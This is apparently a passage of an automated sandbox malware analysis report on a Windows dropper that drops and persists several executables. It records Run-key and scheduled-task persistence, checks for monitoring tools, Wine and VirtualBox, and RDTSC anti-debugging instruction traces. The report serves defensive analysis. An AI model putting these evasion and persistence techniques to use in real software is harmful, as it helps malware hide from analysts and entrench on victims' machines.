Source: random[1].exe0.5.dr Static PE information: section name:
Source: random[1].exe0.5.dr Static PE information: section name: iadgvtjq
Source: random[1].exe0.5.dr Static PE information: section name: xuvqjoqm
Source: random[1].exe0.5.dr Static PE information: section name: .taggant
Source: 7d61336cf8.exe.5.dr Static PE information: section name:
Source: 7d61336cf8.exe.5.dr Static PE information: section name: .rsrc
Source: 7d61336cf8.exe.5.dr Static PE information: section name: .idata
Source: 7d61336cf8.exe.5.dr Static PE information: section name:
Source: 7d61336cf8.exe.5.dr Static PE information: section name: iadgvtjq
Source: 7d61336cf8.exe.5.dr Static PE information: section name: xuvqjoqm
Source: 7d61336cf8.exe.5.dr Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0559957B push ss; retf 0_3_0559957C
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_05599BFD push ss; ret 0_3_05599C16
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_05591000 push cs; retf 0_3_05591052
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0100B261 pushad ; ret 0_3_0100B271
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Code function: 6_2_00BBE849 push eax; mov dword ptr [esp], 1FFF0D71h 6_2_00BBE885
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Code function: 6_2_00BBE849 push 7E23A34Eh; mov dword ptr [esp], edi 6_2_00BBE8B6
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Code function: 6_2_00BBE849 push edi; mov dword ptr [esp], 78796393h 6_2_00BBE8DA
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Code function: 6_2_00BD50BD push eax; mov dword ptr [esp], ecx 6_2_00BD5335
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Code function: 6_2_00BD50BD push 124AFC5Bh; mov dword ptr [esp], esi 6_2_00BD533D
Source: file.exe Static PE information: section name: entropy: 7.981854671595565
Source: OLR88CERN7VQFRQ38J.exe.0.dr Static PE information: section name: entropy: 7.979892252355736
Source: OLR88CERN7VQFRQ38J.exe.0.dr Static PE information: section name: toioyzgt entropy: 7.953146001385448
Source: ENORVNMU067PBMHUGECCERYC06W3ZY.exe.0.dr Static PE information: section name: iadgvtjq entropy: 7.954098168517312
Source: BF3BS0M5707K28RGW9.exe.0.dr Static PE information: section name: entropy: 7.798959629767368
Source: skotes.exe.3.dr Static PE information: section name: entropy: 7.979892252355736
Source: skotes.exe.3.dr Static PE information: section name: toioyzgt entropy: 7.953146001385448
Source: random[1].exe.5.dr Static PE information: section name: entropy: 7.981854671595565
Source: aae25c676b.exe.5.dr Static PE information: section name: entropy: 7.981854671595565
Source: random[1].exe0.5.dr Static PE information: section name: iadgvtjq entropy: 7.954098168517312
Source: 7d61336cf8.exe.5.dr Static PE information: section name: iadgvtjq entropy: 7.954098168517312
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\num[1].exe
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1000995001\num.exe

Boot Survival

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run d7c50276ff.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 7d61336cf8.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run aae25c676b.exe
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe File created: C:\Windows\Tasks\skotes.job
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00F7F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 12_2_00F7F98E
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FF1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 12_2_00FF1C41
Source: C:\Users\user\Desktop\file.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\Desktop\file.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
Source: C:\Users\user\Desktop\file.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D4537 second address: 9D454E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F08C0CB452Fh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D454E second address: 9D3E5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007F08C0C91958h 0x0000000f pop edx 0x00000010 nop 0x00000011 or dword ptr [ebp+122D2009h], ecx 0x00000017 push dword ptr [ebp+122D126Dh] 0x0000001d jmp 00007F08C0C9195Bh 0x00000022 call dword ptr [ebp+122D1FFEh] 0x00000028 pushad 0x00000029 jne 00007F08C0C91957h 0x0000002f xor eax, eax 0x00000031 jnl 00007F08C0C91957h 0x00000037 mov edx, dword ptr [esp+28h] 0x0000003b jno 00007F08C0C9195Ch 0x00000041 jmp 00007F08C0C91969h 0x00000046 mov dword ptr [ebp+122D2EB9h], eax 0x0000004c pushad 0x0000004d sub dword ptr [ebp+122D33CBh], esi 0x00000053 add esi, dword ptr [ebp+122D2DB1h] 0x00000059 popad 0x0000005a mov esi, 0000003Ch 0x0000005f pushad 0x00000060 xor di, F3D0h 0x00000065 xor dword ptr [ebp+122D1C3Dh], edx 0x0000006b popad 0x0000006c add esi, dword ptr [esp+24h] 0x00000070 sub dword ptr [ebp+122D1C52h], edx 0x00000076 lodsw 0x00000078 jmp 00007F08C0C91965h 0x0000007d add eax, dword ptr [esp+24h] 0x00000081 jnp 00007F08C0C91957h 0x00000087 mov ebx, dword ptr [esp+24h] 0x0000008b jmp 00007F08C0C9195Fh 0x00000090 nop 0x00000091 pushad 0x00000092 push eax 0x00000093 jno 00007F08C0C91956h 0x00000099 pop eax 0x0000009a push eax 0x0000009b push edx 0x0000009c jbe 00007F08C0C91956h 0x000000a2 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D3E5D second address: 9D3E71 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F08C0CB4526h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push edx 0x00000010 pop edx 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3B3FE second address: B3B404 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3B404 second address: B3B411 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3B411 second address: B3B415 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3B415 second address: B3B419 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3B419 second address: B3B430 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007F08C0C9195Eh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3B832 second address: B3B85F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F08C0CB4538h 0x00000009 jmp 00007F08C0CB452Ch 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3B85F second address: B3B863 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3B863 second address: B3B867 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3B867 second address: B3B895 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a pushad 0x0000000b jmp 00007F08C0C9195Ch 0x00000010 jno 00007F08C0C91956h 0x00000016 jmp 00007F08C0C9195Ah 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e push edi 0x0000001f pop edi 0x00000020 push edx 0x00000021 pop edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3B895 second address: B3B89F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3B89F second address: B3B8A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3B8A5 second address: B3B8A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3B8A9 second address: B3B8AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3E0E3 second address: B3E0E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3E0E9 second address: B3E114 instructions: 0x00000000 rdtsc 0x00000002 je 00007F08C0C91956h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jbe 00007F08C0C9196Ch 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3E114 second address: B3E11A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3E11A second address: B3E134 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F08C0C91956h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 jnc 00007F08C0C91958h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3E134 second address: B3E14A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c jo 00007F08C0CB4534h 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 pop edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3E14A second address: B3E14E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3E14E second address: B3E15D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3E15D second address: B3E161 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3E161 second address: 9D3E5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pop eax 0x00000008 mov edi, dword ptr [ebp+122D2FC1h] 0x0000000e push dword ptr [ebp+122D126Dh] 0x00000014 sbb di, F88Ah 0x00000019 call dword ptr [ebp+122D1FFEh] 0x0000001f pushad 0x00000020 jne 00007F08C0CB4527h 0x00000026 xor eax, eax 0x00000028 jnl 00007F08C0CB4527h 0x0000002e mov edx, dword ptr [esp+28h] 0x00000032 jno 00007F08C0CB452Ch 0x00000038 jmp 00007F08C0CB4539h 0x0000003d mov dword ptr [ebp+122D2EB9h], eax 0x00000043 pushad 0x00000044 sub dword ptr [ebp+122D33CBh], esi 0x0000004a add esi, dword ptr [ebp+122D2DB1h] 0x00000050 popad 0x00000051 mov esi, 0000003Ch 0x00000056 pushad 0x00000057 xor di, F3D0h 0x0000005c xor dword ptr [ebp+122D1C3Dh], edx 0x00000062 popad 0x00000063 add esi, dword ptr [esp+24h] 0x00000067 sub dword ptr [ebp+122D1C52h], edx 0x0000006d lodsw 0x0000006f jmp 00007F08C0CB4535h 0x00000074 add eax, dword ptr [esp+24h] 0x00000078 jnp 00007F08C0CB4527h 0x0000007e mov ebx, dword ptr [esp+24h] 0x00000082 jmp 00007F08C0CB452Fh 0x00000087 nop 0x00000088 pushad 0x00000089 push eax 0x0000008a jno 00007F08C0CB4526h 0x00000090 pop eax 0x00000091 push eax 0x00000092 push edx 0x00000093 jbe 00007F08C0CB4526h 0x00000099 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3E1BC second address: B3E1C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3E1C0 second address: B3E1D6 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F08C0CB4526h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnl 00007F08C0CB4528h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3E1D6 second address: B3E1DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3E1DC second address: B3E1E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3E2E0 second address: B3E2EA instructions: 0x00000000 rdtsc 0x00000002 je 00007F08C0C9195Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3E533 second address: B3E537 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3E537 second address: B3E543 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3E543 second address: B3E57A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ecx 0x00000008 nop 0x00000009 pushad 0x0000000a and edx, dword ptr [ebp+122D2E61h] 0x00000010 mov edx, 6C0E0EEFh 0x00000015 popad 0x00000016 push 00000000h 0x00000018 add dword ptr [ebp+122D1E1Dh], edi 0x0000001e xor edi, dword ptr [ebp+122D3051h] 0x00000024 push D6EAE8A2h 0x00000029 push eax 0x0000002a push edx 0x0000002b jno 00007F08C0CB452Ch 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3E57A second address: B3E613 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F08C0C9195Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 291517DEh 0x00000011 movsx esi, bx 0x00000014 push 00000003h 0x00000016 push 00000000h 0x00000018 push edi 0x00000019 call 00007F08C0C91958h 0x0000001e pop edi 0x0000001f mov dword ptr [esp+04h], edi 0x00000023 add dword ptr [esp+04h], 00000018h 0x0000002b inc edi 0x0000002c push edi 0x0000002d ret 0x0000002e pop edi 0x0000002f ret 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push ecx 0x00000035 call 00007F08C0C91958h 0x0000003a pop ecx 0x0000003b mov dword ptr [esp+04h], ecx 0x0000003f add dword ptr [esp+04h], 00000017h 0x00000047 inc ecx 0x00000048 push ecx 0x00000049 ret 0x0000004a pop ecx 0x0000004b ret 0x0000004c mov dword ptr [ebp+122D1C0Eh], ecx 0x00000052 push 00000003h 0x00000054 ja 00007F08C0C9196Ch 0x0000005a push 78A00942h 0x0000005f push eax 0x00000060 push edx 0x00000061 push eax 0x00000062 push edx 0x00000063 jmp 00007F08C0C9195Fh 0x00000068 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3E613 second address: B3E61D instructions: 0x00000000 rdtsc 0x00000002 jp 00007F08C0CB4526h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3E61D second address: B3E68F instructions: 0x00000000 rdtsc 0x00000002 je 00007F08C0C9196Dh 0x00000008 jmp 00007F08C0C91967h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f add dword ptr [esp], 475FF6BEh 0x00000016 movzx edi, di 0x00000019 lea ebx, dword ptr [ebp+1243E02Bh] 0x0000001f jbe 00007F08C0C91970h 0x00000025 pushad 0x00000026 call 00007F08C0C91967h 0x0000002b pop edi 0x0000002c popad 0x0000002d xchg eax, ebx 0x0000002e jmp 00007F08C0C91965h 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 jng 00007F08C0C91958h 0x0000003c push edx 0x0000003d pop edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B60DE5 second address: B60DE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B34FEC second address: B34FF2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5EED3 second address: B5EED7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5EED7 second address: B5EEEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ja 00007F08C0C91958h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5EEEB second address: B5EF08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F08C0CB4539h 0x00000009 rdtsc
